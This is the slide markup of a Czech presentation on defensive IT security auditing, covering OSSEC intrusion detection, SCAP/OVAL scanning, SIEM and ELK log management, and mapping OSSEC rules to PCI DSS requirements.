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8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56" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="263" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="265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8" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="257" r:id="rId29"/>
    <p:sldId id="258" r:id="rId30"/>
    <p:sldId id="260" r:id="rId31"/>
    <p:sldId id="261" r:id="rId32"/>
    <p:sldId id="25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 Bezpečnost, Auditing firewallů, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>switchů</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, Linux a Windows systémů v základu.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51072A-1C61-4434-9B52-DAD29CA38CF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962151" y="2697017"/>
            <a:ext cx="8173587" cy="2931473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="231775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0011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00111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60425" indent="-1714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00111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146175" indent="-1714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00111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431925" indent="-1714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00111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89125" indent="-1714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46325" indent="-1714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3525" indent="-1714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0725" indent="-1714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dirty="0" smtClean="0"/>
              <a:t>IT a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rchite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Openprime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, spol. s r.o.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Prezentující: Ing. Martin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Jína</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>mjina@openprime.cz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>openprime.cz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r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> - SCAP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, stejně jako jiné linuxové distribuce, uvolňují své definice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>patchů</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> ve formátu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>OVAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, který pak může být analyzován nástrojem nazvaným </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>openscap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>-scanner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skenování každého systému prostředí společnosti. Tento skener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>SCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>open source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>můžou ho všichni používat zdarma.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>integrováno </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>OSSEC systému </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>a dělá </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>těžkou práci za vás.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Prezentace auditního</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>systému OSSEC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3" y="3336637"/>
            <a:ext cx="3085090" cy="30850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34" y="444211"/>
            <a:ext cx="34861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OSSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>přes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SIEMs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028" t="8856" r="45109" b="43022"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646466" y="2175082"/>
            <a:ext cx="4127157" cy="24960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51072A-1C61-4434-9B52-DAD29CA38CF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646798" y="3046090"/>
            <a:ext cx="129194" cy="28243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2038" y="1512229"/>
            <a:ext cx="7232385" cy="3898940"/>
            <a:chOff x="1678037" y="1512229"/>
            <a:chExt cx="7232385" cy="3898940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1678037" y="1512229"/>
              <a:ext cx="7232385" cy="3898940"/>
              <a:chOff x="714191" y="1575586"/>
              <a:chExt cx="7232385" cy="389894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4348963" y="2358401"/>
                <a:ext cx="1921197" cy="181580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commercial or open source </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="32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SIEM</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="28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</a:br>
                <a:endParaRPr lang="en-US" sz="1200" b="1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6284674" y="1575586"/>
                <a:ext cx="1016011" cy="56605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Syslog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714191" y="4908468"/>
                <a:ext cx="1016011" cy="56605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Syslog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6930565" y="2956302"/>
                <a:ext cx="1016011" cy="56605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Syslog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5936344" y="2227775"/>
                <a:ext cx="275760" cy="218755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>
                <a:stCxn id="13" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1222197" y="4025757"/>
                <a:ext cx="871192" cy="882711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400801" y="3266303"/>
                <a:ext cx="362850" cy="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sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Right Arrow 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4138409" y="3049632"/>
              <a:ext cx="1051430" cy="326539"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="3366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46365" y="2735792"/>
              <a:ext cx="6222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syslog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0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919" y="2387188"/>
            <a:ext cx="2846241" cy="21346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04090" y="1518287"/>
            <a:ext cx="2681765" cy="1259480"/>
            <a:chOff x="5880089" y="1445717"/>
            <a:chExt cx="2681765" cy="125948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641573">
              <a:off x="5880089" y="1681681"/>
              <a:ext cx="1023516" cy="102351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6124">
              <a:off x="6725174" y="1445717"/>
              <a:ext cx="1023516" cy="102351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37064">
              <a:off x="7538338" y="1639691"/>
              <a:ext cx="1023516" cy="1023516"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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909891" y="6473826"/>
            <a:ext cx="372218" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DC51072A-1C61-4434-9B52-DAD29CA38CF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615" y="2612655"/>
            <a:ext cx="1378294" cy="137829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921092" y="269317"/>
            <a:ext cx="8100522" cy="714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ln>
                  <a:solidFill>
                    <a:srgbClr val="C00111"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00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Komerční</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SIEMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsou výborné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ale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11177" y="2266010"/>
            <a:ext cx="3874993" cy="2059246"/>
            <a:chOff x="1987176" y="2193440"/>
            <a:chExt cx="3874993" cy="2059246"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5128358" y="2743419"/>
              <a:ext cx="73381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=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87176" y="2768159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+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776763" y="2193440"/>
              <a:ext cx="2178770" cy="20592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commercial </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="32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SIEM</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="3200" dirty="0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endParaRPr lang="en-US" sz="14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6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51072A-1C61-4434-9B52-DAD29CA38CF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269317"/>
            <a:ext cx="9144000" cy="7143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ln>
                  <a:solidFill>
                    <a:srgbClr val="C00111"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00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dirty="0" smtClean="0"/>
              <a:t>Nyní je tu úplně nový systém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86690" y="1874982"/>
            <a:ext cx="10797309" cy="3870036"/>
            <a:chOff x="653256" y="2293255"/>
            <a:chExt cx="7776214" cy="2035601"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="825889" y="2293255"/>
              <a:ext cx="7603581" cy="2035601"/>
              <a:chOff x="1190935" y="2488060"/>
              <a:chExt cx="6657975" cy="1782447"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1026" name="Picture 2" descr="http://blog.xebia.fr/wp-content/uploads/2013/12/file-logstash-es-kibana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0935" y="2488060"/>
                <a:ext cx="6657975" cy="1657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563753" y="3947106"/>
                <a:ext cx="839663" cy="323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Logstash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34309" y="3947106"/>
                <a:ext cx="738600" cy="323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Kibana</a:t>
                </a:r>
                <a:endParaRPr lang="en-US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256" y="2464371"/>
              <a:ext cx="594777" cy="594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8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56960"/>
            <a:ext cx="9144000" cy="714375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OSSEC Log Management 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Elasticsearch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51072A-1C61-4434-9B52-DAD29CA38CF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://vichargrave.com/wp-content/uploads/2013/11/OSSEC-ElasticSe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20" y="827904"/>
            <a:ext cx="8544428" cy="53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Elasticsearch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780145"/>
            <a:ext cx="10363826" cy="3011054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>text search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lucene</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ukládá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cs-CZ" dirty="0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stru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>kturovaný</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ument</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Insta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>lace s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RPM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1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Logstash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aggregator and parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports transferring parsed data directly to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elasticsearch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controlled by a configuration file that specifies input, filtering (parsing) and output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key to adapting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elasticsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to other log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Kibana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General purpose query UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elasticsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes many widgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kibana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B06090405040202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8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OSSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>Pro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>PCI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>DSS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PCI DSS (PCI DSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> je proprietární </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>bezpečnostní </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>standard pro organizace, které zpracovávají </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>kreditní </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>karty z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>karetních systémů jako je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>Visa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i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>MasterCard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>American</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t> Express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dirty="0" err="1" smtClean="0"/>
              <a:t>Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>JCB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> . Norma byla vytvořena s cílem zvýšit kontrolu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>DAT kolem držitelů karet a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>omezit podvody s kreditními kartami.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>OSSEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> pomáhá realizovat PCI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>DSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>provedením analýzy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>logU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>KoNTROLU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> INTEGRITY DAT Soubor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>sledování </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>polItik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>intrusion detection, real-time alerting and active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>response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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>následující části budeme rozebírat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>některé specifické případy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>použití. Vysvětlují, jak používat OSSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>vlastnosti, tak aby </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>splňovaly požadavky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>PCI-DSS norem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5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 v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>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Část první</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>IT Bezpečnost a auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>CIS (centre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>security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SCAP (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Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty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OSSEC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>pen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>ource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>SEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>urity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ELK (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Elastic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Logstash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Kibana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36" y="2510258"/>
            <a:ext cx="4756378" cy="226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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1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Zde budeme používat OSSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>jako analýzu sběru logů a analýzu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>schopnosti splnit následující ovládací prvky PCI DSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 10.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Neplatné pokusy o logický přístup</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 10.2.5 použití </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>a změny identifikačních a autentizačních mechanismů, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>mimo jiné, Převážně </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>na vytváření nových účtů a eskalaci privilegií, a všechny změny, dodatky, či </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>delegace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>na účtech </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>s právy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t> nebo administrátorskými právy.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>Tyto kontroly vyžadují, abychom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Logovali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>neplatné logické pokusy o přístup, více neplatných pokusů o přihlášení (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>možný </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>útoku hrubou silou), eskalaci oprávnění, změny v účtech, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>atd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>Abychom toho dosáhli, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Jsou přidány </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>PCI DSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" err="1"/>
              <a:t>tagy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t> na pravidlech OSSEC log analýzy mapující jim odpovídající </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>požadavky.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t> Tímto způsobem bude snadné analyzovat a vizualizovat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>OSSEC upozornění </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>související s PCI DSS.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0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Rootcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>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Rootcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> modul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>OSSEC lze použít k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Monitoringu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
